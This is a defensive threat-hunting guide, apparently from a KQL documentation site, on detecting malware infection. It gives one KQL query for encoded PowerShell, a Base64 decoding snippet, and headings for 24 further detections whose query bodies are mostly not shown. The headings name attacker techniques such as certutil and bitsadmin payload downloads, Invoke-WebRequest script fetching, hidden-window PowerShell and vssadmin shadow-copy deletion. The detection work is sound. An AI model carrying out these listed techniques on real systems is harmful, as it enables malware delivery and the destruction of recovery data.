Edit

Detecting Malware Infection (MITRE ATT&CK: T1566, T1059)

Note: Sometimes, you may have to customise the queries to your environment. Also, queries will only work if the data is available.

Detecting Malware Infection (MITRE ATT&CK: T1566, T1059)

Overview:

Malware infection often involves scripts, executables, and payloads designed to compromise systems, execute commands, or maintain persistence. These infections can lead to lateral movement, data theft, or further compromises within the network.

Below are 25 Example Queries for Malware Infection Detection:

  1. Detect Suspicious PowerShell Commands (Encoded Commands) PowerShell-encoded commands often indicate obfuscation used in malware payloads.

DeviceProcessEvents | where FileName == "powershell.exe" and ProcessCommandLine has "encodedCommand" | where InitiatingProcessAccountName !="network service" and InitiatingProcessAccountName !="system"| summarize count() by TimeGenerated, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, ProcessCommandLine

Note: The following is an example of how to decode PowerShell-encoded commands:

# Example encoded string
$EncodedCommand = "enter encoded string"

# Convert from Base64 to bytes
$Bytes = [System.Convert]::FromBase64String($EncodedCommand)

# Convert bytes to string (UTF-16 LE)
$DecodedCommand = [System.Text.Encoding]::Unicode.GetString($Bytes)

# Output the decoded command
Write-Output $DecodedCommand

Method 2: Decode Using Python

Here’s how you can decode it using Python:

  1. Identify Execution of Suspicious EXEs from Temp Directories Malware often resides in temp directories before execution.

  1. Track Use of MSHTA for Malicious Script Execution MSHTA is frequently abused to execute malicious scripts.

  1. Detect Rundll32 Execution of Malicious DLLs Rundll32 is often used to execute malicious DLLs, a common malware technique.

  1. Monitor Execution of Suspicious Scripting Engines Malicious scripts may be executed via WScript or CScript.

  1. Track EXE File Downloads and Execution via CertUtil CertUtil is often abused to download malware payloads.

  1. Identify the Use of LOLBins (Living Off the Land Binaries) Standard system binaries like bitsadmin and msiexec are often used in attacks.

  1. Detect Creation of Suspicious Scheduled Tasks Malware often uses scheduled tasks for persistence.

  1. Monitor PowerShell Script Downloads via Invoke-WebRequest Invoke-WebRequest is used to download malicious scripts from the internet.

  1. Track Suspicious Use of Bitsadmin for File Transfers Bitsadmin is sometimes leveraged to download or upload malicious files.

  1. Detect New EXE Files in User Directories New EXE files appearing in user directories may indicate malware delivery.

  1. Monitor Process Spawning from Office Applications Malicious macros in Office documents may spawn child processes.

  1. Detect the Use of Task Scheduler to Maintain Persistence Scheduled tasks can be created by malware to ensure persistence.

  1. Identify Script Execution via CMD (Batch Scripts) CMD can be used to execute batch scripts in malware infections.

  1. Track PowerShell Use of Bypass Execution Policies Malicious PowerShell scripts often bypass execution policies.

  1. Detect DLL Side-Loading or Injection DLL injection or side-loading is used to execute malicious code within trusted processes.

  1. Monitor Unusual Use of MSBuild for Malware Execution MSBuild is sometimes leveraged to execute code or load malware.

  1. Detect Use of Hidden Windows for Malware Persistence (explorer.exe) Malware can use hidden windows to hide its execution from the user.

  1. Monitor Suspicious Use of CMD for File Deletion Malware may delete files to cover its tracks using the "del" command.

  1. Track Use of Remote Desktop Protocol for Malicious Access RDP is often used to access compromised systems remotely.

  1. Detect Powershell Execution Using Uncommon Flags Malicious scripts may use uncommon flags to bypass detection (e.g., -windowstyle hidden).

  1. Monitor the Use of VSSAdmin for Shadow Copy Deletion Malware (such as ransomware) may delete volume shadow copies to prevent recovery.

  1. Identify Unusual Network Traffic from Newly Executed Binaries Malware often communicates with external C2 servers after execution.

  1. Detect Execution of Signed Binaries Used by Attackers Attackers may abuse trusted signed binaries for malicious purposes (e.g., regsvr32, msiexec).

  1. Monitor the Use of Certutil for Decoding Malicious Payloads Certutil can be used to decode base64-encoded malicious payloads.

PreviousHunting With KQLNextDiscovery Activities (MITRE ATT&CK: T1016, T1083, T1046)

Last updated